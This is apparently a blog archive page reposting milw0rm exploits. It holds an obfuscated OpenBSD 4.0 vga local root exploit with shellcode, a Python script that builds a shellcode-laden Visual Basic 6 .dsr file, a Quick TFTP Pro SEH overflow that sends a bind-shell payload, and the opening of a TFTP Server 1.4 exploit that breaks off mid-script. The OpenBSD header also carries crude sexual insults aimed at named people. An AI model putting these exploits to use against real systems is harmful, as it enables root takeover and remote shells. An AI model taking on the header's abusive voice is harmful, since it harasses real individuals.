Posts Tagged ‘open’

OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)

Posted in 搬家之前 (Before the move) on July 1st, 2008 by 飘 (piao2010)
/*
 *      [ A PRODUCTION OF LUL-DISLCOSURE INC. ]
 *                         PROUDLY PRESENTS...
 *
 *                                     888                    888
 *                                     888                    888
 *                                     888                    888
 *  .d88b.  88888b.   .d88b.  88888b.  88888b.  .d8888b   .d88888
 * d88""88b 888 "88b d8P  Y8b 888 "88b 888 "88b 88K      d88" 888
 * 888  888 888  888 88888888 888  888 888  888 "Y8888b. 888  888
 * Y88..88P 888 d88P Y8b.     888  888 888 d88P      X88 Y88b 888
 *  "Y88P"  88888P"   "Y8888  888  888 88888P"   88888P'  "Y88888
 *          888
 *          888
 *          888                      DID YOU EVER FEEL THE RUSH...
 *                     d8b d8b              ...FOR JIZZ?
 *                     Y8P Y8P
 *
 *                    8888 888 88888888 88888888
 *                    "888 888    d88P     d88P
 *                     888 888   d88P     d88P
 *                     888 888  d88P     d88P
 *                     888 888 88888888 88888888
 *                     888
 *                    d88P
 *                  888P"
 *
 * My final contribution, DA WORLD'S FIRST ANIMATED EXPLOIT!, is the foundation
 * for the next generation of OpenBSD exploits, crafted to burn Theo's eyes and make
 * him spend countless hours not only exercising his supreme reversing skills
 * but also delay his already deadly slow patch release timing. Hopefully every
 * fucktard out there willing to release an exploit for one of the many OpenBSD
 * locally exploitable issues, will give this insanely advanced code a good use.
 * Make sure you include some sanity checks (ie. if uid == 0 and hostname ==
 * cvs.openbsd.org make it do something creative like updating their index.html
 * once in a while).
* * I would like to thank the following people for all the support, fun and * inspiration during my pilgrimage through the incredibly broken community known * as the security industry: *      Jesus H. Christ, Brute Dong, Bob, GOBBLES, towlie, noir and spender. * * I could name several people that I would love to either curbstomp or rape * anally (enjoying every inch of their rectum, though many of them would enjoy * the experience too, i know you dig dicks guys!), but I'll be a nice kid and * simply say that I love how this hdm, jf, FAilja, et al are nothing but * cock monglers. I enjoy how some of them have lost their jobs or got banned * by US immigration. And I also thank McDonalds for making you fatfucks get more * obese and ugly every year. And I'm sorry for the poor strippers that have to * stand the reality of being the only thing ressembling a woman you've ever had * the opportunity to see naked, besides your crack head cock-gobbling mom when * she sodomized you with a chop stick (and we know you liked it). * Hehehehe. BANANA! BANANA! BANANA! BTW, has gadi evron stopped crying for cocks * on craigslist men seeking men board? That fat fuck is sick. LULZ! * * OpenBSD is obsolete, aged, poorly designed, worsly developed and horribly * maintained. And led by a guy who needs to take his head out of his frozen * Canadian ass. FUCK YOU THEO, I'VE GOT YOUR DARPA FUNDING! * * This exploit abuses an old bug to gain root privileges on an OpenBSD 4.0 * system. The ipv6 bug was never fully implemented because this shit made * me get a brain tumor. FUCK YOU THEO! 
 * LULZ LULZ LULZ LULZ LULZ LULZ LULZ
 *
 *  -- 2008 - by LMH
 *
 */
#include /*pax*/<string.h>/*drepper libc rocking on*//**//**//**//**//**//*   */
#include /*It seems to me so strange*/<stdlib.h>/*tax*//**//**//**//**//**//* */
#include /*aint*/<stdio.h>/*mmap NULL rocking the kernel on*//**//**//**//**//**/
#include /*Check wallet for her name*/<unistd.h>/*lax!*//**//**//**//**//**//**/
#include /*Her face is in the muck*/<sys/param.h>/**//**//**//**//**//**//* * */
#include /*Her face is in the muck*/<err.h>/**//**//**//**//**//**//**//**//* */
#include /*I think her zippers stuck*/<sys/ioctl.h>/*death    OPENBSD SECURE  */
#include /*It is perfect for me*/<sys/syscall.h>/*threats    THANKS TO PAX    */
#include /*To practice surgery*/<fcntl.h>/**//**//*  #########   BUY   */
#include /*One look coagulates*/<sys/types.h>/*mail ##horror##    ### SPENDER */
#include /*Its time to operate*/<sys/stat.h>/*arrives #sick###    ### A NEW   */
#include /*Just keep it going*/<sys/mman.h>/*pain ###pain#####    ### POSTER! */
#include /*Just keep it going*/<sys/sysctl.h>/*feels ##dumb###    ############*/
#define /*Just keep it going*/ma main/*theo: ##feels########## ance M  #######*/
#define /*Shes not dead, shes gonna live*/s /*fuck*/stdout/*##   Havok #######*/
#define /*Shes not dead, shes gonna live*/x fflush/*the ######################*/
#define /*I see her eyes rolling back in her head*/_s /*pain*/sleep/* GG NOIR */
#define /*Come on lets take her home*/f for/**//**//**//**//**//**//**//**//* */
#define /*I think i heard her groan*/v /*what*/void/**//**//**//**//**//**//* */
#define /*Hold on or she will sink*/__0 while/**//**//**//**//**//**//**//*   */
#define /*Just keep it going*/_c /*is*/char/*acter issues*//**//**//**//**//* */
#define /*You can fake it*/_____ sizeof/**//**//**//**//**//**//*  *//**//*   */
#define /*It's time to operate*/____ /*the*/printf/**//**//**//**//**//**//*  */
#define /*It's time to operate*/___ return/**//**//**//**//**//**//*  *//**//**/
#define /*It's time to operate*/__ /*of*/int/**//**//**//**//**//**//**//**//**/
#define /*It's time to operate*/_t static/**//**//**//**//**//**//**//**//*   */
#define /*It's time to operate*/_ki struct kinfo_proc/**//**//**//**//**//*   */
#define /*It's time to operate*/_pi pid_t/**//**//**//**//**//**//*   *//**//**/
#define /*It's time to operate*/______ unsigned int/**//**//**//**//**//**//* */
#define /*It's time to operate*/_______ err/**//**//**//**//**//**//*  *//*   */
#define /*It's time to operate*/__ki exit/**//**//**//**//**//**//*  *//**//* */
#define /*It's time to operate*/__sy sysctl/**//**//**//**//**//**//*  *//*   */
#define /*Heroin winner cup.*/ctkrn (__)0x00000000/**//**//**//**//**//**//*  */
#define /*It's time to operate*/kproc (__)0x0000000E/**//**//**//**//**//**//**/
#define /*Inject. Overdose. End.*/kppid (__)(/**/ctkrn+/**/0x00000001)/**//*  */
#define /*That cigar tube smells like lost elections*/dirtysanchez mmap/**//* */
#define /*It's time to operate*/________/**/printf/**//**//**//**//**//**//*  */
#define /*It's time to operate*/_________/**/unsigned long/**//**//**//**//*  */
#define /*It's time to operate*/_m/**/memcpy/**//**//**//**//**//**//**//*    */
#define /*It's time to operate*/__________/**/setuid/**//**//**//**//**//**//**/
#define /*It's time to operate*/___________/**/seteuid/**//**//**//**//**//*  */
#define /*It's time to operate*/____________/**/execl/**//**//**//**//**//*   */
#define aaaaaaaaaaaaaaaa O_RDWR
#define ____rw_c_ (aaaaaaaaaaaaaaaa|O_CREAT)
#define ____se_e_ (S_IRUSR|S_IWUSR)
#define reopen close
#define _w_w_w_w_w_w_w_w write
#define meltwax  PROT_READ|PROT_EXEC
#define raadt MAP_FIXED
#define openbsdsec MAP_FAILED
#define molest syscall
#define provos SYS_ioctl
_c macaddr[]=""; // Used for ICMPv6 exploit: VMWare network interface mac addr
/* many years... *Theo sheds a FREE tear* Sigh.
===================================================================
RCS file: /usr/OpenBSD/cvs/www/index.html,v
retrieving revision 1.548
retrieving revision 1.549
diff -u -r1.548 -r1.549
--- www/index.html 2007/03/12 17:21:59 1.548
+++ www/index.html 2007/03/13 22:39:47 1.549
@@ -78,7 +78,7 @@
  <a href="art1.html"><img border="0" src="images/puffy40.gif" height=199
 <br>
 <center><strong><font color="#e00000">
-Only one remote hole in the default install, in more than 10 years!<br>
+Only two remote holes in the default install, in more than 10 years!<br>
 </font></strong></center>
 <p>
 The OpenBSD project produces a <b>FREE</b>, multi-platform 4.4BSD-based
*/
_c shlr[]="\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9\xd1\xd1\xd1\xc9"
"\xd1\xd1\xd1\xc9\xd1\xd1\xd1\x39\xde\xd1\xd1\xd1\xa9\x87\xe5\xc3\x2f\x1b\x7c"//
"\x0f\x7c\x0f\x3e\x6f\x41\x41\x41\x8e\x5a\xde\x5a\x88\xc1\xe0\x11\x58\x92\xd5"//
"\x5a\xc2\x58\x93\xd5\x69\x80\x96\x99\x01\x2e\x31\xd1";
double obsdv;
_________//
mg1=0x21524110;
_________ mg2=0xcc99e897;
_________ mg3=0xffffffff;
_________ mg4=0x12345678;
_c shl[]="\x85\xc8\xc3\xc4\x85\xd9\xc2\xaa";
v gpr(_pi dp,_ki *kp);///
_c tks[]="\x6e\x35\x2c\x31\x6e\x35\x29\x24\x2e\x6f\x19\x19\x19\x19\x19\x41";
_c gde[]="\x00\x4b\x4a\x59\x00\x5b\x5b\x56\x6c\x1f\x2f";

_t v evi(){
_________ rts[2]={0xee5f9be,0xebdfc46};
__ i,moo,moooo;
v *p;
_________ ppa;
_ki kp;
rts[0]=rts[0]^(mg1^mg3);
rts[1]=rts[1]^(mg2^mg4);
gpr((_pi)getpid(),//
&kp);
ppa=(_________)kp.kp_eproc.e_paddr;
shlr[24+5]=ppa&0xff;
shlr[24+6]=(ppa>>8)&0xff;
shlr[24+7]=(ppa>>16)&0xff;
shlr[24+8]=(ppa>>24)&0xff;
____("\x5b\x2b\x5d\x20""\x53\x68\x65\x6c\x6c\x63\x6f\x64\x65\x3a\x20""%u bytes at %p\x0a",(unsigned)//
_____(shlr),&shlr);
moo=mkstemp(tks);
if(moo<0){_______(1,"\x6f\x70\x65\x6e");}
_w_w_w_w_w_w_w_w(moo,shlr,_____(shlr));
if((lseek(moo,0L,SEEK_SET))<0){_______(1,"\x6c\x73\x65\x65\x6b");}
p=dirtysanchez(0,_____(shlr),meltwax,raadt,moo,0);
if(p==openbsdsec){_______(1,"\x6d\x6d\x61\x70");}
moooo=open(gde,O_RDWR);
if(moooo<0){munmap(p,_____(shlr));reopen(moo);_______(1,"\x6f\x70\x65\x6e");}
molest(provos,moooo,0x80044103,NULL);
reopen(moooo);
reopen(moo);
___________(0);
__________(ctkrn);
____________(shl,"sh",(v *)ctkrn);
}

double vobsd(){
__ rg[2],l;
_c *p;
double re;
rg[0]=CTL_KERN;
rg[1]=KERN_OSRELEASE;
if(__sy(rg,2,NULL,(size_t *)&l,NULL,0)==-1){_______(1,"\x73\x79\x73\x63\x74\x6c");}
if((p=malloc(l))==NULL){_______(1,NULL);}
if(__sy(rg,2,p,(size_t *)&l,NULL,0)==-1){_______(1,"\x73\x79\x73\x63\x74\x6c");}
re=atof(p);
____("\x5b\x2b\x5d\x20""\x4f\x70\x65\x6e\x42\x53\x44\x20\x72\x65\x6c\x65\x61\x73\x65\x20\x64\x65\x74"
"\x65\x63\x74\x65\x64\x3a\x20""%s (%f)\n",p,re);
free(p);
___ re;
}

v uss(){
____(/**/"\x4f\x70\x65\x6e\x42\x53\x44\x3a\x20\x4f\x6e\x6c\x79\x20\x73\x65\x63\x75\x72\x65"
"\x20\x69\x6e\x20\x73\x69\x6e\x67\x6c\x65\x20\x75\x73\x65\x72\x20\x65\x6e\x76\x69"
"\x72\x6f\x6e\x6d\x65\x6e\x74\x73\x20\x66\x6f\x72\x20\x6d\x6f\x72\x65\x20\x74\x68"
"\x61\x6e\x20\x31\x30\x20\x79\x65\x61\x72\x73\x21\x0a\x0a\x54\x61\x72\x67\x65\x74"
"\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x69\x6c\x69\x74\x79\x3a\x0a\x09\x76\x67\x61"
"\x3a\x20\x76\x67\x61\x5f\x69\x6f\x63\x74\x6c\x28\x29\x20\x6c\x6f\x63\x61\x6c\x20"
"\x65\x78\x70\x6c\x6f\x69\x74\x20\x20\x20\x28\x34\x2e\x30\x20\x61\x6e\x64\x20\x33"
"\x2e\x39\x20\x67\x65\x6e\x65\x72\x69\x63\x20\x69\x33\x38\x36\x29\x0a\x09\x69\x70"
"\x36\x34\x30\x3a\x20\x49\x43\x4d\x50\x76\x36\x20\x72\x65\x6d\x6f\x74\x65\x20\x65"
"\x78\x70\x6c\x6f\x69\x74\x20\x20\x20\x20\x20\x28\x34\x2e\x30\x20\x67\x65\x6e\x65"
"\x72\x69\x63\x20\x69\x33\x38\x36\x29\x20\x28\x72\x6f\x6f\x74\x20\x72\x65\x71\x75"
"\x69\x72\x65\x64\x21\x29\x0a\x0a\x44\x61\x72\x65\x20\x79\x6f\x75\x20\x74\x6f\x20"
"\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x65\x78\x70\x6c\x6f\x69\x74\x20\x61\x73\x20"
"\x72\x6f\x6f\x74\x2e\x20\x4f\x70\x65\x6e\x42\x53\x0a\x0a");
__ki(-1);
}

v gpr(_pi dp,_ki *kp){
__ rg[4],l;
rg[0]=ctkrn;
rg[1]=kproc;
rg[2]=kppid;
rg[3]=dp;
l=_____(_ki);
if(__sy(rg,4,kp,(size_t *)&l,NULL,0)<0){
_______(1,"\x73\x79\x73\x63\x74\x6c");
_______(1,"\x43\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x72\x65\x74\x72\x69\x65\x76\x65\x20"
"\x70\x72\x6f\x63\x20\x73\x74\x72\x75\x63\x74\x75\x72\x65\x21\x0a");
}
}

_t v xo(_c u[],______ l,__ k){
______ i;
f(i=0;i<l;i++){u[i]=u[i]^k;}
}

_t __ was=0;

v pg(__ w,_c*rr[],__ nz,__ wsn){
__ i,b;
_c *u=0;
__0(was<wsn){
f(i= 0;i<nz;i++){
u=rr[i];
f(b=0;b<w;b++){____("\b");}
____("%s",u);
x(s);
_s(1);
}
was++;
}
____("\n"/*A*/);/*{*/
}/*r},v*/

__ ma(__ a,_c **g){
_c *theosmovie[]={"\x53\x75\x63\x6b\x69\x6e\x67"/**//**//**/
"\x20\x6f\x6e\x20\x6d\x79\x20\x74\x69\x74\x74\x69\x65\x73\x20\x6c\x69\x6b\x65\x20"
"\x79\x6f\x75\x20\x77\x61\x6e\x74\x65\x64\x20\x6d\x65\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20","\x43\x61\x6c\x6c\x69\x6e\x67\x20\x6d\x65\x2c\x20\x61\x6c\x6c"
"\x20\x74\x68\x65\x20\x74\x69\x6d\x65\x20\x6c\x69\x6b\x65\x20\x42\x6c\x6f\x6e\x64"
"\x69\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","\x43\x68\x65"
"\x63\x6b\x20\x6f\x75\x74\x20\x6d\x79\x20\x63\x68\x72\x69\x73\x73\x79\x20\x62\x65"
"\x68\x69\x6e\x64\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20","\x49\x74\x27\x73\x20\x66\x69\x6e\x65\x20\x61"
"\x6c\x6c\x20\x6f\x66\x20\x74\x68\x65\x20\x74\x69\x6d\x65\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20",
"\x4c\x69\x6b\x65\x20\x73\x65\x78\x20\x6f\x6e\x20\x74\x68\x65\x20\x62\x65\x61\x63"
"\x68\x65\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","\x57\x68\x61\x74\x20\x65\x6c\x73"
"\x65\x20\x69\x73\x20\x69\x6e\x20\x74\x68\x65\x20\x74\x65\x61\x63\x68\x65\x73\x20"
"\x6f\x66\x20\x70\x65\x61\x63\x68\x65\x73\x3f\x20\x48\x75\x68\x3f\x20\x57\x68\x61"
"\x74\x3f\x20","\x48\x75\x68\x3f\x20\x52\x69\x67\x68\x74\x2e\x20\x57\x68\x61\x74"
"\x3f\x20\x55\x68\x68\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","\x48\x75\x68\x3f"
"\x20\x52\x69\x67\x68\x74\x2e\x20\x57\x68\x61\x74\x3f\x20\x55\x68\x68\x3f\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20","\x53\x49\x53\x20\x49\x55\x44\x2c\x20\x73\x74\x61"
"\x79\x20\x69\x6e\x20\x73\x63\x68\x6f\x6f\x6c\x20\x27\x63\x61\x75\x73\x65\x20\x69"
"\x74\x27\x73\x20\x74\x68\x65\x20\x62\x65\x73\x74\x20\x20\x20\x20\x20\x20\x20",
"\x49\x55\x44\x20\x53\x49\x53\x2c\x20\x73\x74\x61\x79\x20\x69\x6e\x20\x73\x63\x68"
"\x6f\x6f\x6c\x20\x27\x63\x61\x75\x73\x65\x20\x69\x74\x27\x73\x20\x74\x68\x65\x20"
"\x62\x65\x73\x74\x20\x20\x20\x20\x20\x20\x20","\x53\x49\x53\x20\x49\x55\x44\x2c"
"\x20\x73\x74\x61\x79\x20\x69\x6e\x20\x73\x63\x68\x6f\x6f\x6c\x20\x27\x63\x61\x75"
"\x73\x65\x20\x69\x74\x27\x73\x20\x74\x68\x65\x20\x62\x65\x73\x74\x20\x20\x20\x20"
"\x20\x20\x20","Fuck the pain away? Fuck the pain away!\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20","Fuck the pain away! Fuck the pain away?\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20","Fuck the 0day away. Fuck the pain away!"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","Fuck the pain away! Fuck the"
" pain away?\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20","Fuck the 0day aw"
"ay? Fuck the pain away!\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"};
____("\033[2J\x20\x20\x5f\x5f\x5f\x20\x20\x20\x20\x20\x20\x20\x4f\x70\x65\x6e\x42\x53"
"\x44\x20\x4d\x6f\x76\x69\x65\x20\x62\x79\x20\x54\x68\x65\x6f\x20\x64\x65\x20\x52"
"\x61\x61\x64\x74\x0a\x20\x2f\x2f\x20\x20\x37\x20\x20\x20\x20\x20\x20\x53\x74\x61"
"\x72\x72\x69\x6e\x67\x2e\x2e\x2e\x0a\x28\x5f\x2c\x5f\x2f\x5c\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x2e\x2e\x2e\x68\x69\x6d\x73\x65\x6c\x66\x21\x0a"
"\x20\x5c\x20\x20\x20\x20\x5c\x0a\x20\x20\x5c\x20\x20\x20\x20\x5c\x20\x20\x20\x20"
"\x20\x42\x72\x6f\x75\x67\x68\x74\x20\x74\x6f\x20\x79\x6f\x75\x20\x62\x79\x2e\x2e"
"\x2e\x0a\x20\x20\x5f\x5c\x20\x20\x20\x20\x5c\x5f\x5f\x0a\x20\x28\x20\x20\x5c\x20"
"\x20\x20\x20\x20\x20\x29\x20\x20\x20\x20\x20\x54\x68\x65\x6f\x27\x73\x20\x6c\x6f"
"\x73\x74\x20\x44\x41\x52\x50\x41\x20\x66\x75\x6e\x64\x69\x6e\x67\x0a\x20\x20\x5c"
"\x5f\x5f\x5f\x5c\x5f\x5f\x5f\x2f\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x26"
"\x20\x50\x65\x61\x63\x68\x65\x73\x2e\x0a\x0a");
/* Fuck the 0day away. */
if(a<2){uss();}
obsdv=vobsd();
pg(80,theosmovie,_____(theosmovie)/_____(_c *),1);
xo(shl,_____(shl),shl[_____(shl)]);
xo(shlr,_____(shlr),0xd1);
xo(tks,_____(tks),0x41);
xo(gde,_____(gde), 0x2f);
if(obsdv==4.0&&!strcmp(g[1],"vga")){evi();}
/*That's it.*/
___ 0;
}/*Easy to fingerprint, eh?*/

// milw0rm.com [2008-07-01]

MS Visual Basic Enterprise Ed. 6 SP6 DSR File Local BOF Exploit

Posted in 搬家之前 (Before the move) on April 9th, 2008 by 飘 (piao2010)
#usage: exploit.py

print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"

buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12

shellcode = (
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
    "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
    "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
    "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
    "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
    "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
    "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
    "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
    )

dsrfile = (
    "VERSION 5.00\n"
    "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
    "   ClientHeight    =   6315\n"
    "   ClientLeft      =   0\n"
    "   ClientTop       =   0\n"
    "   ClientWidth     =   7980\n"
    "   _ExtentX        =   14076\n"
    "   _ExtentY        =   11139\n"
    "   FolderFlags     =   1\n"
    '   TypeLibGuid     =   "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
    '   TypeInfoGuid    =   "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
    "   TypeInfoCookie  =   0\n"
    "   Version         =   4\n"
    "   NumConnections  =   1\n"
    "   BeginProperty Connection1\n"
    '      ConnectionName  =   "Connection1"\n'
    "      ConnDispId      =   1001\n"
    "      SourceOfData    =   3\n"
    '      ConnectionSource=   ""\n'
    "      Expanded        =   -1  'True\n"
    "      QuoteChar       =   96\n"
    "      SeparatorChar   =   46\n"
    "   EndProperty\n"
    "   NumRecordsets   =   1\n"
    "   BeginProperty Recordset1\n"
    '      CommandName     =   "Command1"\n'
    "      CommDispId      =   1002\n"
    "      RsDispId        =   1003\n"
    '      CommandText     =   "' + buff + get_EIP + nop + shellcode + nop + '"\n'
    '      ActiveConnectionName=   "Connection1"\n'
    "      CommandType     =   2\n"
    "      dbObjectType    =   1\n"
    "      Locktype        =   3\n"
    "      IsRSReturning   =   -1  'True\n"
    "      NumFields       =   1\n"
    "      BeginProperty Field1\n"
    "         Precision       =   10\n"
    "         Size            =   4\n"
    "         Scale           =   0\n"
    "         Type            =   3\n"
    '         Name            =   "ID"\n'
    '         Caption         =   "ID"\n'
    "      EndProperty\n"
    "      NumGroups       =   0\n"
    "      ParamCount      =   0\n"
    "      RelationCount   =   0\n"
    "      AggregateCount  =   0\n"
    "   EndProperty\n"
    "End\n"
    'Attribute VB_Name = "DataEnvironment1"\n'
    "Attribute VB_GlobalNameSpace = False\n"
    "Attribute VB_Creatable = True\n"
    "Attribute VB_PredeclaredId = True\n"
    "Attribute VB_Exposed = False\n"
    )

try:
    out_file = open("DataEnvironment1.dsr",'w')
    out_file.write(dsrfile)
    out_file.close()
    print "\nFILE CREATION COMPLETED!\n"
except:
    print " \n -------------------------------------"
    print "  Usage: exploit.py"
    print " -------------------------------------"
    print "\nAN ERROR OCCURS DURING FILE CREATION!"

# milw0rm.com [2008-04-04]

Quick TFTP Pro 2.1 Remote SEH Overflow Exploit (0day)

Posted in 搬家之前 (Before the move) on March 30th, 2008 by 飘 (piao2010)
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
#########################################################

import socket
import sys

print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"
print "[*] http://www.offensive-security.com"

host = '172.16.167.134'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = "pwnd"

# windows/shell_bind_tcp - 317 bytes
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444
shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
"\xff\xd0")

mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell
muha = "\x00\x02" + filename+ "\0" + mode + "\0"

print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"

# milw0rm.com [2008-03-26]

TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day)

Posted in 搬家之前 (Before the move) on March 30th, 2008 by 飘 (piao2010)
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
#
# C:\Windows\system32>
##################################################################

import socket
import sys

print "[*] TFTP Server for Windows V1.4 ST (0day)"
print "[*] http://www.offensive-security.com"

host = '172.16.167.134'
port = 69

try:
